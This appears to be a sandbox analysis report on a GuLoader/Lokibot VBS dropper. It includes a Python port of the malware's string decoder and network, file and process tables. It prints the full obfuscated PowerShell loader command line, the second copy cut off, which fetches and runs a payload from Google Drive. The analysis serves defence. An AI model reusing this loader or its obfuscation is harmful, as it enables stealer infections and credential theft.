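    """The script runs `cmd /c set /A 115^^0`; cmd turns ^^ into ^, so the
    expression is 115 XOR 0 = 115 and [char]115 is 's'. 's' + 'ubstring' is the
    method the decode loop invokes on each literal."""
    return chr(expr_value) + "ubstring"


def greaseless(blob: str, offset: int = OFFSET, step: int = STEP) -> str:
    """Port of Greaseless: blob[offset], blob[offset+step], ... while the index
    is below len(blob)-1 (Rigsrevisorloven4 returns Length-1 and the loop tests
    -lt), so the final filler chunk is dropped."""
    return "".join(blob[i] for i in range(offset, len(blob) - 1, step))


# PowerShell single-quoted strings escape ' as ''; the pattern allows that.
_LITERAL = re.compile(r"Greaseless\s+'((?:[^']|'')*)'")


def decode_literals(script: str) -> list[str]:
    """Decode every Greaseless '...' literal found in a PowerShell script text."""
    return [greaseless(m.group(1).replace("''", "'")) for m in _LITERAL.finditer(script)]


# Literals copied from the command line in this report.
IEX = "ManglediRinninge buliabxunderv "
TRANSFERRING = ("ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde"
                " C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ")
# The report wraps this literal after "Overdom. "; the wrap is read as the
# single space the original command line carries there (assumption).
PAYLOAD_URL = (
    "haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenr"
    "C.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerwe"
    "Overdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ix"
    "clinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenel"
    "AssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendC"
    "G.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt sc"
    "prighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1"
    "Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus "
)


def payload_url() -> str:
    """Decoded second-stage download URL: a drive.google.com/uc?export=download
    link, matching the drive.google.com traffic in the Network table."""
    return greaseless(PAYLOAD_URL)


if __name__ == "__main__":
    print("method:", resolve_method_name())
    for label, blob in (("invoke", IEX), ("verb", TRANSFERRING)):
        print(f"{label:7} {greaseless(blob)}")
    print("url    ", payload_url())
```

`greaseless` takes the offset and step as parameters because other scripts built with this scheme change those two numbers and the filler words while keeping the loop shape; read them off the `For(...)` header of the captured script before decoding, and use `decode_literals` to sweep a whole script in one pass.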

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.146:80 crl.microsoft.com tcp
NL 142.250.179.142:443 drive.google.com tcp
NL 142.251.36.33:443 drive.usercontent.google.com tcp

Files

memory/1212-16-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1212-17-0x0000000002870000-0x0000000002878000-memory.dmp

memory/1212-18-0x0000000002CA0000-0x0000000002CC2000-memory.dmp

memory/1212-19-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1212-20-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-21-0x0000000002AB0000-0x0000000002AC2000-memory.dmp

memory/1212-22-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1212-23-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-24-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-25-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DQXVUI804L86F8K9D92.temp

MD5 ca01db601cb05e0bfb553367bd49d033
SHA1 a68268457978b2ff2d9d5329883b57709adf3f44
SHA256 64c45a706f3d8ef66def539981f84534d395e9045359136a6d2c1e46d9e8c4f5
SHA512 918c5370e72616e8c9de19fd1798145d9883886a39ab8752e1de4e145f27761ad464319eb17e50d470427d2b82c8fd957a619f5cc515f23f6ace11d74a8d130c

memory/1212-28-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-29-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1212-30-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-31-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1136-33-0x0000000002CD0000-0x0000000002D10000-memory.dmp

memory/1136-32-0x0000000072D30000-0x00000000732DB000-memory.dmp

memory/1136-34-0x0000000072D30000-0x00000000732DB000-memory.dmp

memory/1212-35-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1136-36-0x0000000002CD0000-0x0000000002D10000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 211771b8306b4df71d2a1099cd2460e9
SHA1 d1ab514058c1e2058f0904fef16df876addce6be
SHA256 0e4a23b253b8c9a9f73cc646259ddf001c9ac9c089a3727bb78df33552f37628
SHA512 e773bb71e4db65c68a5997d380068976facbcab97c03c9f0c2bcd6b0c5b7e821cbb1bc116e78e130805ce45bd9444db9931626168ca767dcd6b54a51d5e5b525

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 ddcde6f00e701c39a183b23e268aa671
SHA1 fc1bcdc60cc8e9f5e37883539d20ea330edda727
SHA256 d88738ba308762b61429ac0b4be38b963ab91db5a91d37b00c1a6a05dd96dfd8
SHA512 1e1bd6018888c7ee898fdfb252dac9bb4ae4898c1de254dd2c0fe88593180c03694b0368d97b5f8bf94340c67d04584de9754236d86999c7ce42e431b0f7b68b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/1136-53-0x0000000002CD0000-0x0000000002D10000-memory.dmp

memory/1136-54-0x0000000006120000-0x0000000006121000-memory.dmp

memory/1136-55-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/1136-56-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/1136-58-0x0000000076CF0000-0x0000000076E99000-memory.dmp

memory/1136-59-0x0000000072D30000-0x00000000732DB000-memory.dmp

memory/1136-60-0x0000000002CD0000-0x0000000002D10000-memory.dmp

memory/1136-61-0x0000000076EE0000-0x0000000076FB6000-memory.dmp

memory/2796-62-0x0000000000A20000-0x0000000003840000-memory.dmp

memory/2796-63-0x0000000076CF0000-0x0000000076E99000-memory.dmp

memory/2796-64-0x0000000076EE0000-0x0000000076FB6000-memory.dmp

memory/2796-65-0x0000000076F16000-0x0000000076F17000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f162ad07b9edfb1bddeb70b568f2466d
SHA1 bc033077f34e28deff7e99265c05a68cf93ab1c0
SHA256 e1a611bae1f29f2a467af83c6d42186742a43146eea12eee15d4e2995cd8831d
SHA512 8ee786e70fefd98c67f7ddef244ea957e2e82b69207dd10274169e71685eb081c80c7c85898e81c8203ba4a5ab3ffe7bc31369dce1c19b59e845fb1bcb50e4e2

C:\Users\Admin\AppData\Local\Temp\TarC0B1.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/1136-83-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/2796-87-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1136-91-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/1212-92-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/2796-96-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2796-97-0x0000000000A20000-0x0000000003840000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-11 14:32

Reported

2024-03-11 14:34

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3976 set thread context of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2256 wrote to memory of 2968 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 2968 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 3316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 3976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3976 wrote to memory of 2740 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 2740 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 2740 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 3976 wrote to memory of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. 
KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 
Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: 
Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. 
KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 
Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet 